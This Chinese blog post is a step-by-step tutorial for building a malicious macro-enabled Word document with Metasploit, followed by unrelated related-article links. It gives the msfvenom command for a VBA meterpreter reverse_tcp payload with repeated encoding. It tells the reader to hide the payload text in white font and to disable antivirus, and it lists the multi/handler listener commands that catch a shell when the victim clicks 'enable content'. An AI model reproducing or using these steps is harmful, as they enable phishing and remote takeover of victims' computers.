首页 > 其他分享 >利用宏感染Word文档(基于MSF)

利用宏感染Word文档(基于MSF)

时间:2023-02-09 09:56:19浏览次数:51  
标签:set Word windows word 代码 文档 MSF

1.生成我们的vba代码

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
执行完成后会生成两段代码,第一段代码是 MACRO CODE 宏代码。
从这里开始:

到这里结束:

第二段代码:payload

从红框开始下面的都是

2.打开Office对宏的支持

在word选项中的自定义功能区中点击对开发工具的支持,我的是默认开启的。

随便找一个word文件



(操作的时候要关闭杀毒软件,实际情景中要做免杀的)
ctrl +s保存
把我们的第二段添加到word文档正文里面

这里显示这么多的异常字符,我们可以把字体设置为白色,这样看上去就正常了
把文件另存为
(注意格式为启用宏的word文档)

3.启动MSF监听

msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.59.134 set lport 4444 run

4.双击打开我们制作好的文档


当目标点击 启用内容 的选型后就会上线

标签:set,Word,windows,word,代码,文档,MSF
From: https://www.cnblogs.com/FlipByte/p/17104176.html

相关文章

  • 7、install_mysql_httpd_php_wordpress
    #!/bin/bash##********************************************************************#Author: zikang#QQ: [email protected]#Date: 2021-03-03......
  • 8、change_root_password
    #!/bin/bashrpm-qsshpass&>/dev/null||yum-yinstallsshpassexportSSHPASS=1NET=10.0.0foriin{1..7};do{ PASS=`opensslrand-b......
  • 开源工具文档库
    nginx:​​http://nginx.org/en/docs/beginners_guide.html​​​openresty: ​​https://github.com/openresty/lua-nginx-module​​openresty最佳实践: ​​https:/......
  • Bitwarden 正式收购开源创业公司 Passwordless.dev
    近些年黑客入侵企业系统、窃取企业关键数据、信息和源代码的事件频繁发生,很多时候黑客并没有使用什么高科技的手段,而是利用员工泄漏的账号登录了内部系统,从而获取了想要......
  • 完整工作流整合方案,自定义配置,Java+Vue+Activiti@附配套文档
    前言activiti工作流引擎项目,企业erp、oa、hr、crm等企事业办公系统轻松落地,一套完整并且实际运用在多套项目中的案例,满足日常业务流程审批需求。一、项目形式springboot......
  • 论文文档格式
    大论文设置页眉部分的上粗下细线https://www.bilibili.com/video/BV1qT4y1i7wM/?vd_source=08f2fe3f5caa2d2714e8d9d3d972cbf1......
  • docker搭建yapi接口文档系统、Idea中上传接口、在线调用
    一、前言在我们后端开发中,必不可少的是接口的交接,有很多种方式,常见的就是swagger,不过这个侵入性太强了。还有就是接口文档的框架,比如今天小编带大家一起搭建的yapi,在公司......
  • springboot3 security 从始至终--02 PasswordEncoder
    接下来几个章节,将逐个介绍身份验证流程中主要接口接口描述UserDetails代表SpringSecurity所看到的用户GrantedAuthority定义应用程序目的范围内允许用户执......
  • Sword vsprintf自定义实现
    /*vsprintf自定义实现*/#include<stdlib.h>#include<string.h>#include<stdio.h>#include<errno.h>#include<assert.h>#include<stdarg.h>#include<math.......
  • 个人docsify在线文档搭建
    一、创建docsify项目官网:https://docsify.js.org/#/1、前期准备npmidocsify-cli-g2、创建项目  创建一个项目文件夹,并进入文件夹:docsifyinit./docs二、d......